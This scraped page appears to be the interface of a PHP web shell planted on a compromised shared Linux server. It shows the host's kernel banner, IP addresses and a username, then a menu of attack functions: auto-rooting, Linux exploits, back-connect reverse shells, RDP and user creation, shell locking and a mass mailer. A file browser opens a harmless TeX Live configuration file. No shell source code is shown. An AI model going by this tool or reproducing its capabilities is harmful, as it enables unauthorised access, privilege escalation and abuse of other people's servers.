Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
texlive-doc /
texlive /
texlive-en /
[ HOME SHELL ]
Name
Size
Permission
Action
archive
[ DIR ]
drwxr-xr-x
.dict.pws.gz
2.74
KB
-rw-r--r--
ChangeLog
696
B
-rw-r--r--
Makefile
3.11
KB
-rw-r--r--
README
240
B
-rw-r--r--
live4ht.cfg
1.4
KB
-rw-r--r--
tex-live.css
1.1
KB
-rw-r--r--
tex-live.sty.gz
5.6
KB
-rw-r--r--
texlive-en.css
15.81
KB
-rw-r--r--
texlive-en.html
343.43
KB
-rw-r--r--
texlive-en.pdf
1.11
MB
-rw-r--r--
texlive-en.tex.gz
57.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : live4ht.cfg
% $Id: live4ht.cfg 61734 2022-01-25 17:27:53Z karl $ % tex4ht configuration file for the TeX Live documentation. % Accumulated over many years. Public domain. % % We specify tex4ht options on the htlatex command line; see ./Makefile. % \Preamble still needs to be invoked, though. \Preamble{} % add extra stylesheet \Configure{@HEAD}{\HCode{% <link rel="stylesheet" type="text/css" href="\jobname.css" >\Hnewline <link rel="stylesheet" type="text/css" href="tex-live.css" >\Hnewline }} % or LaTeX complains it is missing. \begin{document} \EndPreamble % simplify output for HTML. We leave TeX and LaTeX alone, since tex4ht % actually does the lowered E (and raised A) in CSS. \def\OMEGA{Omega} \def\LaTeXe{LaTeX2e} \def\eTeX{e-\TeX} \def\acro#1{#1} \def\MF{Metafont} \def\BibTeX{BibTeX} \def\warningbox{} \def\endwarningbox{} \newif\ifhackliterals \ifx\tldocenglish\undefined \else \hackliteralstrue \fi \ifx\tldocrussian\undefined \else \hackliteralstrue \fi \ifx\tldocgerman\undefined \else \hackliteralstrue \fi % \ifhackliterals % these definitions cause "missing } inserted" at \end{tabularx} in % French and Czech. don't know why. % % don't make these into links, as happens with \path. We only have a few % special characters that actually occur. \def\dirname{\texttt\bgroup\catcode`\$=12 \catcode`\_=12 \catcode`\~=12 \finishliteral} \def\finishliteral#1{#1\egroup} \let\filename=\dirname \fi
Close